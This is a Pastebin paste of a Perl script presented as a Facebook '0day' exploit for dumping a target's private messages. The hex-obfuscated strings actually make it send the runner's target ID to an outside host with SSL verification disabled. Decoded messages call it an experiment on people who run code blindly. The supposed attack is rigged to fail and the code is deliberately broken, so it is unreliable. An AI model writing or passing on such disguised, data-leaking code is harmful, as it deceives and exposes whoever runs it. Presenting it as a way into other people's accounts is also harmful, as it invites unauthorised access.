Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #usage: facepwn.pl [target]
- use warnings;
- use strict;
- use WWW::Mechanize;
- # build the 0day exploit containing target name/facebook_ID
- # returns network stack to 'probe' the backend mobile listener
- # when listener is probed, data is leaked
- # may require a flux capacitor
- sub build_sploit{
- my $target=shift;
- #buid payload
- print "[+] Building sploit\n";
- my $OO0O0O="\x57\x57\x57\x3a\x3a\x4d\x65\x63\x68\x61\x6e\x69\x7a\x65";
- my @OOO0=("\x66\x61\x6b\x65\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x73\x74\x61\x63\x6b\x20\x6c\x6f\x6c");
- my $OO="\x53\x53\x4c\x5f\x76\x65\x72\x69\x66\x79\x5f\x6d\x6f\x64\x65";
- my $OOOO00="\x76\x65\x72\x69\x66\x79\x5f\x68\x6f\x73\x74\x6e\x61\x6d\x65";
- #initiate network stack
- my $OOO0O=$OO0O0O->new(ssl_opts=>{$OO=>0,$OOOO00=>0});
- my $OO00O="\x4c\x6f\x6f\x6b\x73\x20\x6c\x69\x6b\x65\x20\x79\x6f\x75\x20\x64\x65\x2d\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x20\x74\x68\x65\x20\x63\x6f\x64\x65\x2e\x2e\x2e";
- my $OO0="\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x73\x69\x6d\x70\x6c\x65\x20\x65\x78\x70\x65\x72\x69\x6d\x65\x6e\x74\x20\x74\x6f\x20\x73\x65\x65\x20\x68\x6f\x77\x20\x6d\x61\x6e\x79\x20\x70\x65\x6f\x70\x6c\x65\x20\x72\x75\x6e\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x62\x6c\x69\x6e\x64\x6c\x79";
- my $OO0O="\x62\x6c\x6f\x67\x20\x70\x6f\x73\x74\x20\x72\x65\x76\x65\x61\x6c\x69\x6e\x67\x20\x74\x68\x65\x20\x64\x61\x74\x61\x20\x77\x69\x6c\x6c\x20\x62\x65\x20\x70\x75\x62\x6c\x69\x73\x68\x65\x64\x20\x73\x6f\x6f\x6e\x2e\x2e\x2e\x73\x74\x61\x79\x20\x74\x75\x6e\x65\x64";
- my $OO000="\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x68\x6c\x34\x6e\x6b\x2e\x63\x6f\x2e\x76\x75\x2f\x69\x5f\x72\x75\x6e\x5f\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x5f\x63\x6f\x64\x65\x3f$target";
- $OOO0O->get($OO000);
- #build network stack
- push @0000,$OO00O;
- #push target ID onto stack
- push @0000,$target;
- push @0000,$OO0;
- push @0000,$OO0O;
- return @0000;
- }
- #build sploit from target {user_input}
- my @payloads=build_sploit($ARGV[0]);
- #iterate through the stack and fire payloads:
- foreach(@payloads){
- my $attack=WWW::Mechanize->new();
- print "[+] Attacking $ARGV[0]...\n";
- if(my $attack="x73\x3a\x2f\x2f" eq $_ ? 1 : 0){
- my $messages=$attack->get("https://m.facebook.com/m/01/messages/$_");
- print "[+] Success! Dumping data:\n";
- print $messages;
- }else{
- print "[!] Something went wrong, modify the payload.\n";
- exit 1;
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement